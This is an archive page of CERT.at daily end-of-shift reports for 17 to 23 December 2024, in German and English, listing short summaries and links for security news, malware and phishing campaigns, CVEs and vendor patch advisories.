- Daily - CERT.at

Tageszusammenfassung - 23.12.2024
by Daily end-of-shift report 23 Dec '24

23 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 20-12-2024 18:00 − Montag 23-12-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ Middle East Cyberwar Rages On, With No End in Sight ∗∗∗ --------------------------------------------- Since October 2023, cyberattacks among countries in the Middle East have persisted, fueled by the conflict between Israel and Hamas, reeling in others on a global scale. --------------------------------------------- https://www.darkreading.com/cyberattacks-data-breaches/middle-east-cyberwar… ∗∗∗ Cloud Atlas seen using a new tool in its attacks ∗∗∗ --------------------------------------------- We analyze the latest activity by the Cloud Atlas gang. The attacks employ the PowerShower, VBShower and VBCloud modules to download victims data with various PowerShell scripts. --------------------------------------------- https://securelist.com/cloud-atlas-attacks-with-new-backdoor-vbcloud/115103/ ∗∗∗ Modiloader From Obfuscated Batch File ∗∗∗ --------------------------------------------- My last investigation is a file called "Albertsons Payments.gz", received via email. The file looks like an archive but is identified as a picture by .. --------------------------------------------- https://isc.sans.edu/diary/Modiloader+From+Obfuscated+Batch+File/31540 ∗∗∗ Vulnerability & Patch Roundup - November 2024 ∗∗∗ --------------------------------------------- Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help .. --------------------------------------------- https://blog.sucuri.net/2024/12/vulnerability-patch-roundup-november-2024.h… ∗∗∗ Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service ∗∗∗ --------------------------------------------- An interruption to the phishing-as-a-service (PhaaS) toolkit called Rockstar 2FA has led to a rapid uptick in activity from another nascent offering named FlowerStorm."It appears that the [Rockstar2FA] group running the service experienced at least a .. --------------------------------------------- https://thehackernews.com/2024/12/rockstar2fa-collapse-fuels-expansion-of.h… ∗∗∗ l+f: Sicherheitsforscher bestellt bei McDonalds für 1 Cent ∗∗∗ --------------------------------------------- Der McDonalds-Lieferservice in Indien war kaputt und Bestellungen waren umfangreich manipulierbar. --------------------------------------------- https://www.heise.de/news/l-f-Sicherheitsforscher-bestellt-bei-McDonald-s-f… ∗∗∗ Webbrowser: Chrome und Edge sollen mittels KI vor Spam-Seiten warnen ∗∗∗ --------------------------------------------- Um Nutzer vor betrügerischen Websites zu warnen, haben Chrome und Edge neuerdings einen KI-Schutz an Bord. Noch ist das Feature aber nicht standardmäßig aktiv. --------------------------------------------- https://www.heise.de/news/Webbrowser-Chrome-und-Edge-sollen-mittels-KI-vor-… ∗∗∗ Heels on fire. Hacking smart ski socks ∗∗∗ --------------------------------------------- TL;DR A silly-season BLE connectivity story Overheat people’s smart ski socks .. but only when in Bluetooth range AND when the owner’s phone is out of range of their feet! Having […]The post Heels on fire. Hacking smart ski socks first appeared on Pen Test Partners. --------------------------------------------- https://www.pentestpartners.com/security-blog/heels-on-fire-hacking-smart-s… ∗∗∗ Fast zwei Drittel aller gestohlenen Kryptogelder wanderten 2024 nach Nordkorea ∗∗∗ --------------------------------------------- Eine aktuelle Analyse zeigt, dass der Gesamtwert gestohlener Kryptowährungen heuer bisher um 21 Prozent auf 2,2 Milliarden Dollar gestiegen ist --------------------------------------------- https://www.derstandard.at/story/3000000250591/fast-zwei-drittel-aller-gest… ∗∗∗ NSO-Group für WhatsApp-Angriff mit Pegasus-Spyware schuldig gesprochen ∗∗∗ --------------------------------------------- Im Jahr 2019 wurden WhatsApp-Nutzer Opfer eines Angriffs durch Spyware, die über eine Schwachstelle auf Android und iOS-Geräte installiert werden konnte. WhatsApp verklagte die NSO Group, die den .. --------------------------------------------- https://www.borncity.com/blog/2024/12/22/nso-group-fuer-angriff-mit-pegasus… ∗∗∗ Jingle Shells: How Virtual Offices Enable a Facade of Legitimacy ∗∗∗ --------------------------------------------- Virtual offices have revolutionized the way businesses operate. They provide cost-effective flexibility by eliminating the .. --------------------------------------------- https://www.team-cymru.com/post/how-virtual-offices-enable-a-facade-of-legi… ∗∗∗ A Primer on JA4+: Empowering Threat Analysts with Better Traffic Analysis ∗∗∗ --------------------------------------------- What is JA4+ and Why Does It Matter? Introduction Threat analysts and researchers are continually seeking tools and methodologies to gain .. --------------------------------------------- https://www.team-cymru.com/post/a-primer-on-ja4-empowering-threat-analysts-… ∗∗∗ Supply Chain Attack Hits Rspack, Vant npm Packages with Monero Miner ∗∗∗ --------------------------------------------- Popular npm packages, Rspack and Vant, were recently compromised with malicious code. Learn about the attack, the impact, and how to protect your projects from similar threats. --------------------------------------------- https://hackread.com/supply-chain-attack-rspack-vant-npm-monero-miner/ ∗∗∗ Checking It Twice: Profiling Benign Internet Scanners — 2024 Edition ∗∗∗ --------------------------------------------- A comprehensive analysis of benign internet scanning activity from November 2024, examining how quickly and thoroughly various legitimate scanning services (like Shodan, Censys, and others) discover and probe new internet-facing assets. The study deployed 24 new sensors across 8 geographies and 5 autonomous systems, revealing that most scanners .. --------------------------------------------- https://www.greynoise.io/blog/checking-it-twice-profiling-benign-internet-s… ∗∗∗ Kritische Sicherheitslücken bedrohen Sophos-Firewalls ∗∗∗ --------------------------------------------- Es sind wichtige Sicherheitsupdates für Firewalls von Sophos erschienen. Mit den Standardeinstellungen installieren sie sich automatisch. --------------------------------------------- https://heise.de/-10218914 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (gst-plugins-base1.0, libxstream-java, php-laravel-framework, python-urllib3, and sqlparse), Fedora (chromium, libcomps, libdnf, mingw-directxmath, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, mingw-orc, ofono, prometheus-podman-exporter, .. --------------------------------------------- https://lwn.net/Articles/1003287/ ∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0008 ∗∗∗ --------------------------------------------- Date Reported: December 22, 2024 Advisory ID: WSA-2024-0008 CVE identifiers: CVE-2024-54479, CVE-2024-54502, CVE-2024-54505, CVE-2024-54508, CVE-2024-54534 Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2024-54479 Versions affected: WebKitGTK and WPE WebKit before 2.46.5. Credit to Seunghyun Lee. Impact: Processing maliciously .. --------------------------------------------- https://webkitgtk.org/security/WSA-2024-0008.html ∗∗∗ TR-91 - Vulnerability identified as CVE-2024-0012, affecting Palo Alto Networks PAN-OS software ∗∗∗ --------------------------------------------- https://www.circl.lu/pub/tr-91 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 20.12.2024
by Daily end-of-shift report 20 Dec '24

20 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 19-12-2024 18:00 − Freitag 20-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ In eigener Sache: CERT.at sucht Junior IT-Security Analyst:in (m/w/d - Vollzeit - Wien) ∗∗∗ --------------------------------------------- Für unsere laufenden Routinetätigkeiten suchen wir derzeit eine:n Berufsein- oder -umsteiger:in mit Interesse an IT-Security. --------------------------------------------- https://www.cert.at/de/ueber-uns/jobs/ ∗∗∗ BadBox malware botnet infects 192,000 Android devices despite disruption ∗∗∗ --------------------------------------------- The BadBox Android malware botnet has grown to over 192,000 infected devices worldwide despite a recent sinkhole operation that attempted to disrupt the operation in Germany. --------------------------------------------- https://www.bleepingcomputer.com/news/security/badbox-malware-botnet-infect… ∗∗∗ The Windows Registry Adventure #5: The regf file format ∗∗∗ --------------------------------------------- This post aimed to systematically explore the inner workings of the regf format, focusing on the hard requirements enforced by Windows. Due to my role and interests, I looked at the format from a strictly security-oriented angle rather than digital forensics, which is the context in which registry hives are typically considered. --------------------------------------------- https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventu… ∗∗∗ BellaCPP: Discovering a new BellaCiao variant written in C++ ∗∗∗ --------------------------------------------- While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed "BellaCPP". --------------------------------------------- https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/ ∗∗∗ Auslaufmodell NTLM: Aus Windows 11 24H2 und Server 2025 teils entfernt ∗∗∗ --------------------------------------------- Weitgehend unbemerkt wurden in Windows 11 24H2 und Server 2025 zudem NTLMv1 entfernt. --------------------------------------------- https://heise.de/-10217239 ===================== = Vulnerabilities = ===================== ∗∗∗ ZDI-24-1718: (0Day) Arista NG Firewall custom_handler Directory Traversal Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2024-12830. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1718/ ∗∗∗ ZDI-24-1724: (0Day) Delta Electronics DRASimuCAD STP File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DRASimuCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12836. --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1724/ ∗∗∗ Sophos: Resolved Multiple Vulnerabilities in Sophos Firewall (CVE-2024-12727, CVE-2024-12728, CVE-2024-12729) ∗∗∗ --------------------------------------------- Sophos has resolved three independent security vulnerabilities in Sophos Firewall (2x Critical, 1x High). To confirm that the hotfix has been applied to your firewall, please refer to KBA-000010084. --------------------------------------------- https://www.sophos.com/en-us/security-advisories/sophos-sa-20241219-sfos-rce ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (chromium and gunicorn), Fedora (jupyterlab), Oracle (bluez, containernetworking-plugins, edk2:20220126gitbb1bba3d77, edk2:20240524, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, libsndfile, libsndfile:1.0.31, mpg123, mpg123:1.32.9, pam, python3.11-urllib3, skopeo, tuned, and unbound:1.16.2), SUSE (avahi, docker, emacs, govulncheck-vulndb, haproxy, kernel, libmozjs-128-0, python-grpcio, python310-xhtml2pdf, sudo, and tailscale), and Ubuntu (dpdk, linux-hwe-5.15, and linux-iot). --------------------------------------------- https://lwn.net/Articles/1003019/ ∗∗∗ Autodesk: DWFX File Parsing Vulnerabilities in Autodesk Navisworks Desktop Software ∗∗∗ --------------------------------------------- https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0027 ∗∗∗ Tenable: [R1] Stand-alone Security Patch Available for Tenable Security Center versions 6.3.0, 6.4.0 and 6.4.5: SC-202412.1 ∗∗∗ --------------------------------------------- https://www.tenable.com/security/tns-2024-21 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 19.12.2024
by Daily end-of-shift report 19 Dec '24

19 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 18-12-2024 18:00 − Donnerstag 19-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Attackers exploiting a patched FortiClient EMS vulnerability in the wild ∗∗∗ --------------------------------------------- During a recent incident response, Kaspersky’s GERT team identified a set of TTPs and indicators linked to an attacker that infiltrated a company’s networks by targeting a Fortinet vulnerability for which a patch was already available. --------------------------------------------- https://securelist.com/patched-forticlient-ems-vulnerability-exploited-in-t… ∗∗∗ HubPhish Abuses HubSpot Tools to Target 20,000 European Users for Credential Theft ∗∗∗ --------------------------------------------- Cybersecurity researchers have disclosed a new phishing campaign that has targeted European companies with an aim to harvest account credentials and take control of the victims Microsoft Azure cloud infrastructure. [..] Targets include at least 20,000 automotive, chemical, and industrial compound manufacturing users in Europe. [..] The attacks involve sending phishing emails with Docusign-themed lures that urge recipients to view a document, which then redirects users to malicious HubSpot Free Form Builder links, from where they are led to a fake Office 365 Outlook Web App login page in order to steal their credentials. --------------------------------------------- https://thehackernews.com/2024/12/hubphish-exploits-hubspot-tools-to.html ∗∗∗ Spyware distributed through Amazon Appstore ∗∗∗ --------------------------------------------- Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon App Store, which is secretly stealing the package name of installed apps and incoming SMS messages under the guise of a simple health tool. --------------------------------------------- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spyware-distributed-th… ∗∗∗ Achtung: AG Reparaturservice ist Betrug ∗∗∗ --------------------------------------------- Geschirrspüler kaputt? Die Website ag-reparaturservice.at bietet angeblich Reparaturen verschiedenster Geräte an. Von Kühlschränken über Waschmaschinen bis hin zu Backöfen repariert das Unternehmen angeblich Haushaltsgeräte. Wir raten zur Vorsicht: Die Reparatur wird trotz Bezahlung nicht durchgeführt. Sie verlieren Ihr Geld. Wir zeigen Ihnen, wie Sie die Betrugsmasche erkennen! --------------------------------------------- https://www.watchlist-internet.at/news/ag-reparaturservice-ist-betrug/ ∗∗∗ CISA urges senior government officials to lock down mobile devices amid ongoing Salt Typhoon breach ∗∗∗ --------------------------------------------- A 5-page advisory provided troves of guidance for both Apple and Android users, urging all “highly targeted individuals” to rely on the “consistent use of end-to-end encryption.” --------------------------------------------- https://therecord.media/cisa-urges-senior-officials-to-lock-down-devices-sa… ∗∗∗ Hacker könnten über Schwachstellen in Solaranlagen das europäische Stromnetz knacken ∗∗∗ --------------------------------------------- Unschöne, aber keineswegs neue Erkenntnis. Deutschland ist zwar "stolz" ob der installierten Leistung an Solarkollektoren. Aber ein griechischer White Hat-Hacker hat gezeigt, wie er sich mittels Notebook und Internet in zahlreiche europäischen Solaranlagen hacken und diese – auch in Deutschland – einfach ausknipsen könnte. --------------------------------------------- https://www.borncity.com/blog/2024/12/19/hacker-koennten-ueber-schwachstell… ∗∗∗ Kritische LDAP-Schwachstelle in Windows (CVE-2024-49112) ∗∗∗ --------------------------------------------- Noch ein kleiner Nachtrag vom Dezember 2024-Patchday. Zum 10. Dezember 2024 hat Microsoft einen kritische Schwachstelle (CVE-2024-49112) im Lightweight Directory Access Protocol (LDAP) öffentlich gemacht. Diese ermöglicht Remote-Angriffe auf Windows-Clients und -Server, wurde aber gepatcht. [..] Hunter schreibt, dass jährlich 178.900 LDAP- und LDAPS-Dienste jährlich beim Scans über hunter.how gefunden würden. --------------------------------------------- https://www.borncity.com/blog/2024/12/19/kritische-ldap-schwachstelle-in-wi… ∗∗∗ Exploring vulnerable Windows drivers ∗∗∗ --------------------------------------------- This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about malicious Windows drivers. --------------------------------------------- https://blog.talosintelligence.com/exploring-vulnerable-windows-drivers/ ∗∗∗ Betrugsmail: Cyberversicherung muss Schaden nicht ersetzen ∗∗∗ --------------------------------------------- Klassisches Mail-Spoofing kostete eine deutsche Firma 85.000 Euro. Ihre Cyberversicherung deckt den Schaden nicht, sagt das Landgericht Hagen. --------------------------------------------- https://heise.de/-10215212 ∗∗∗ Skuld Infostealer Returns to npm with Fake Windows Utilities and Malicious Solara Development Packages ∗∗∗ --------------------------------------------- Socket’s threat research team identified a malware campaign infiltrating the npm ecosystem, deploying the Skuld infostealer just weeks after a similar attack targeted Roblox developers. [..] Before their removal, these packages compromised hundreds of machines, demonstrating how even low-complexity attacks can rapidly gain traction. --------------------------------------------- https://socket.dev/blog/skuld-infostealer-returns-to-npm ===================== = Vulnerabilities = ===================== ∗∗∗ FortiWLM Unauthenticated limited file read vulnerability ∗∗∗ --------------------------------------------- A relative path traversal [CWE-23] in FortiWLM may allow a remote unauthenticated attacker to read sensitive files. Severity: Critical, CVE-2023-34990 --------------------------------------------- https://www.fortiguard.com/psirt/FG-IR-23-144 ∗∗∗ FortiManager OS command injection ∗∗∗ --------------------------------------------- An Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) vulnerability [CWE-78] in FortiManager may allow an authenticated remote attacker to execute unauthorized code via FGFM crafted requests. Severity: High, CVE-2024-48889 --------------------------------------------- https://fortiguard.fortinet.com/psirt/FG-IR-24-425 ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (bluez, edk2:20220126gitbb1bba3d77, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, kernel-rt, mpg123, php:8.2, python3.11-urllib3, and tuned), Fedora (ColPack, glibc, golang-github-chainguard-dev-git-urls, golang-github-task, icecat, python-nbdime, python3.13, and python3.14), Mageia (kernel, kmod-xtables-addons, kmod-virtualbox, dwarves and kernel-linus), Red Hat (gstreamer1-plugins-base and gstreamer1-plugins-good), SUSE (curl, emacs, git-bug, glib2, helm, kernel, and traefik2), and Ubuntu (gst-plugins-base1.0, gst-plugins-good1.0, gstreamer1.0, libvpx, linux-gcp, phpunit, and yara). --------------------------------------------- https://lwn.net/Articles/1002903/ ∗∗∗ Delta Electronics DTM Soft ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-03 ∗∗∗ Hitachi Energy SDM600 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-02 ∗∗∗ Hitachi Energy RTU500 series CMU ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-01 ∗∗∗ Ossur Mobile Logic Application ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-354-01 ∗∗∗ Tibbo AggreGate Network Manager ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-05 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.12.2024
by Daily end-of-shift report 18 Dec '24

18 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 17-12-2024 18:00 − Mittwoch 18-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Critical security hole in Apache Struts under exploit ∗∗∗ --------------------------------------------- A critical security hole in Apache Struts 2 [..] CVE-2024-53677 [..] is currently being exploited using publicly available proof-of-concept (PoC) code. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/12/17/critical_rce… ∗∗∗ How to Lose a Fortune with Just One Bad Click ∗∗∗ --------------------------------------------- Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click "yes" to a Google prompt on his mobile device. --------------------------------------------- https://krebsonsecurity.com/2024/12/how-to-lose-a-fortune-with-just-one-bad… ∗∗∗ AI-generated malvertising “white pages” are fooling detection engines ∗∗∗ --------------------------------------------- In this blog post, we take a look at a couple of examples where threat actors are buying Google Search ads and using AI to create white pages. The content is unique and sometimes funny if you are a real human, but unfortunately a computer analyzing the code would likely give it a green check. --------------------------------------------- https://www.malwarebytes.com/blog/cybercrime/2024/12/ai-generated-malvertis… ∗∗∗ Spotify: Vorsicht vor betrügerischen Phishing-Mails ∗∗∗ --------------------------------------------- Derzeit häufen sich Meldungen über betrügerische E-Mails, die angeblich von Spotify stammen. Es sei ein Problem mit der Zahlungsabwicklung aufgetreten, sodass Spotify die Nutzungsgebühr nicht abbuchen konnte und daher den Account vorübergehend gesperrt hat. Um Spotify weiter nutzen zu können, werden Sie aufgefordert die Kontoinformationen zu aktualisieren. Es handelt sich jedoch um Phishing! --------------------------------------------- https://www.watchlist-internet.at/news/spotify-vorsicht-vor-betruegerischen… ∗∗∗ Detailing the Attack Surfaces of the Tesla Wall Connector EV Charger ∗∗∗ --------------------------------------------- Trend ZDI researchers have performed an analysis of the discrete hardware components found in the device. --------------------------------------------- https://www.thezdi.com/blog/2024/12/16/detailing-the-attack-surfaces-of-the… ∗∗∗ Phishing-Masche nimmt Nutzer von Google-Kalender ins Visier ∗∗∗ --------------------------------------------- Cyberkriminelle nutzen laut einer Analyse von Sicherheitsforschern offenbar verstärkt Google-Kalender-Invites, um Internetnutzer auf Phishingseiten zu locken. --------------------------------------------- https://heise.de/-10214705 ∗∗∗ [Guest Diary] A Deep Dive into TeamTNT and Spinning YARN, (Wed, Dec 18th) ∗∗∗ --------------------------------------------- TeamTNT is running a crypto mining campaign dubbed Spinning YARN. Spinning YARN focuses on exploiting Docker, Redis, YARN, and Confluence. On November 4th, 2024, my DShield sensor recorded suspicious activity targeting my web server. The attacker attempted to use a technique that tricks the server into running harmful commands. --------------------------------------------- https://isc.sans.edu/diary/rss/31530 ===================== = Vulnerabilities = ===================== ∗∗∗ BeyondTrust BT24-10: Command Injection Vulnerability / Severity: Critical ∗∗∗ --------------------------------------------- A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. CVE(s): CVE-2024-12356 --------------------------------------------- https://www.beyondtrust.com/trust-center/security-advisories/bt24-10 ∗∗∗ Juniper: 2024-12 Reference Advisory: Session Smart Router: Mirai malware found on systems when the default password remains unchanged ∗∗∗ --------------------------------------------- On Wednesday, December 11, 2024, several customers reported suspicious behavior on their Session Smart Network (SSN) platforms. These systems have been infected with the Mirai malware and were subsequently used as a DDOS attack source to other devices accessible by their network. The impacted systems were all using default passwords. Any customer not following recommended best practices and still using default passwords can be considered compromised as the default SSR passwords have been added to the virus database. [..] This affects all versions of Session Smart Router (SSR) --------------------------------------------- https://supportportal.juniper.net/s/article/2024-12-Reference-Advisory-Sess… ∗∗∗ Foxit PDF Editor und Reader: Attacken über präparierte PDF-Dateien möglich ∗∗∗ --------------------------------------------- PDF-Anwendungen von Foxit sind unter macOS und Windows verwundbar. Sicherheitsupdates stehen bereit. [..] Die Einstufung des Bedrohungsgrads der Lücken (CVE-2024-49576, CVE-2024-47810) steht zurzeit noch aus. --------------------------------------------- https://heise.de/-10211267 ∗∗∗ Windows-Sicherheitslösung Trend Micro Apex One als Einfallstor für Angreifer ∗∗∗ --------------------------------------------- Angreifer können an mehreren Sicherheitslücken in Trend Micro Apex One ansetzen. Sicherheitsupdates sind verfügbar. [..] Die darin geschlossenen Sicherheitslücken (CVE-2024-52048, CVE-2024-52049, CVE-2024-52050, CVE-2024-55631, CVE-2024-55632, CVE-2024-55917) sind mit dem Bedrohungsgrad "hoch" eingestuft. --------------------------------------------- https://heise.de/-10213518 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (libsndfile, php:7.4, python3.11, python3.12, and python36:3.6), Debian (dpdk), Mageia (curl and socat), Oracle (firefox and tuned), Red Hat (bluez, containernetworking-plugins, edk2, edk2:20220126gitbb1bba3d77, edk2:20240524, expat, gstreamer1-plugins-base, gstreamer1-plugins-base and gstreamer1-plugins-good, gstreamer1-plugins-good, kernel, libsndfile, libsndfile:1.0.31, mpg123, mpg123:1.32.9, pam, python3.11-urllib3, skopeo, tuned, unbound, and unbound:1.16.2), SUSE (cloudflared, curl, docker, firefox, gstreamer-plugins-good, kernel, libmozjs-115-0, libmozjs-128-0, libmozjs-78-0, libsoup, ovmf, python-urllib3_1, subversion, thunderbird, and traefik), and Ubuntu (editorconfig-core, libspring-java, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-ibm, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, linux-oem-6.8, linux-oracle, linux-oracle-6.8, linux-raspi, linux, linux-gcp, linux-gcp-5.15, linux-gke, linux-gkeop, linux-ibm, linux-ibm-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-nvidia, linux-oracle, linux-oracle-5.15, linux-raspi, linux, linux-gcp, linux-gcp-5.4, linux-hwe-5.4, linux-kvm, linux-raspi, linux, linux-lowlatency, linux-oracle, linux-aws, linux-aws-5.15, linux-aws, linux-aws-5.4, linux-bluefield, linux-oracle, linux-oracle-5.4, and linux-oem-6.11). --------------------------------------------- https://lwn.net/Articles/1002703/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.12.2024
by Daily end-of-shift report 17 Dec '24

17 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Montag 16-12-2024 18:00 − Dienstag 17-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Verbraucherzentrale warnt vor aktueller Paypal-Betrugsmasche ∗∗∗ --------------------------------------------- Die Verbraucherzentrale NRW warnt, dass Kriminelle "Bezahlen ohne Paypal-Konto" missbrauchen. Schutz davor ist kaum möglich. [..] Im Zentrum der Kritik steht eine Paypal-Bezahloption, die sich "Zahlen ohne Paypal-Konto" nennt und auch als "Gast-Konto" oder "Gastzahlung" bekannt ist. Damit können Käufer über das Lastschrift-Verfahren zahlen, ohne dass ein Paypal-Konto angelegt wird. Dafür ist eine IBAN anzugeben. --------------------------------------------- https://heise.de/-10202355 ∗∗∗ Malicious ads push Lumma infostealer via fake CAPTCHA pages ∗∗∗ --------------------------------------------- DeceptionAds can be seen as a newer and more dangerous variant of the "ClickFix" attacks, where victims are tricked into running malicious PowerShell commands on their machine, infecting themselves with malware. ClickFix actors have employed phishing emails, fake CAPTCHA pages on pirate software sites, malicious Facebook pages, and even GitHub issues redirecting users to dangerous landing pages. --------------------------------------------- https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-inf… ∗∗∗ Over 25,000 SonicWall VPN Firewalls exposed to critical flaws ∗∗∗ --------------------------------------------- Over 25,000 publicly accessible SonicWall SSLVPN devices are vulnerable to critical severity flaws, with 20,000 using a SonicOS/OSX firmware version that the vendor no longer supports. [..] Public exposure means that the firewall's management or SSL VPN interfaces are accessible from the internet, presenting an opportunity for attackers to probe for vulnerabilities, outdated/unpatched firmware, misconfigurations, and brute-force weak passwords. --------------------------------------------- https://www.bleepingcomputer.com/news/security/over-25-000-sonicwall-vpn-fi… ∗∗∗ Sicherheitsbehörde warnt: Kernel-Schwachstelle in Windows wird aktiv ausgenutzt ∗∗∗ --------------------------------------------- Konkret geht es um die Sicherheitslücke CVE-2024-35250. Diese ermöglicht es Angreifern, auf anfälligen Systemen ihre Rechte auszuweiten. Nach Angaben der US-Cybersicherheitsbehörde Cisa gibt es neuerdings Hinweise auf eine aktive Ausnutzung. [..] Patches gegen CVE-2024-35250 stehen schon seit Juni für alle anfälligen Betriebssysteme bereit und dürften daher auf den meisten Systemen längst eingespielt worden sein. --------------------------------------------- https://www.golem.de/news/sicherheitsbehoerde-warnt-kernel-schwachstelle-in… ∗∗∗ Python Delivering AnyDesk Client as RAT, (Tue, Dec 17th) ∗∗∗ --------------------------------------------- Yesterday, I found an interesting piece of Python script that will install AnyDesk on the victim’s computer. Even better, it reconfigures the tool if it is already installed. The script, called “an5.py” has a low VT score (6/63). Note that the script is compatible with Windows and Linux victims. --------------------------------------------- https://isc.sans.edu/diary/rss/31524 ∗∗∗ Technical Analysis of RiseLoader ∗∗∗ --------------------------------------------- In October 2024, Zscaler ThreatLabz came across malware samples that use a network communication protocol that is similar to RisePro. However, unlike RisePro which has primarily been used for information stealing, this new malware specializes in downloading and executing second-stage payloads. Due its distinctive focus and similarities with RisePro’s communication protocol, we named this new malware family RiseLoader. --------------------------------------------- https://www.zscaler.com/blogs/security-research/technical-analysis-riseload… ∗∗∗ Earth Koshchei Coopts Red Team Tools in Complex RDP Attacks ∗∗∗ --------------------------------------------- APT group Earth Koshchei, suspected to be sponsored by the SVR, executed a large-scale rogue RDP campaign using spear-phishing emails, red team tools, and sophisticated anonymization techniques to target high-profile sectors. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/l/earth-koshchei.html ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (gstreamer1.0), Fedora (jupyterlab and python-notebook), Oracle (gimp:2.8.22, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, php:8.2, postgresql, and python3.11), SUSE (aws-iam-authenticator, firefox, installation-images, kernel, libaom, libyuv, libsoup, libsoup2, python-aiohttp, socat, thunderbird, and vim), and Ubuntu (curl, Docker, imagemagick, and kernel). --------------------------------------------- https://lwn.net/Articles/1002496/ ∗∗∗ CrushFTP: Attacken auf Admins möglich ∗∗∗ --------------------------------------------- Angreifer können in Logs von CrushFTP Schadcode verstecken. Dagegen gerüstete Versionen sind verfügbar. --------------------------------------------- https://heise.de/-10202537 ∗∗∗ Xen Security Advisory CVE-2024-53241 / XSA-466 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-466.html ∗∗∗ Xen Security Advisory CVE-2024-53240 / XSA-465 ∗∗∗ --------------------------------------------- https://xenbits.xen.org/xsa/advisory-465.html ∗∗∗ Rockwell Automation PowerMonitor 1000 Remote ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-03 ∗∗∗ Hitachi Energy TropOS Devices Series 1400/2400/6400 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-02 ∗∗∗ ThreatQuotient ThreatQ Platform ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-352-01 ∗∗∗ MISP v2.5.3 and v2.4.201 released with numerous enhancements, bug fixes, and security improvements to strengthen threat information sharing capabilities. ∗∗∗ --------------------------------------------- https://github.com/MISP/MISP/releases/tag/v2.5.3 ∗∗∗ BD Diagnostic Solutions Products ∗∗∗ --------------------------------------------- 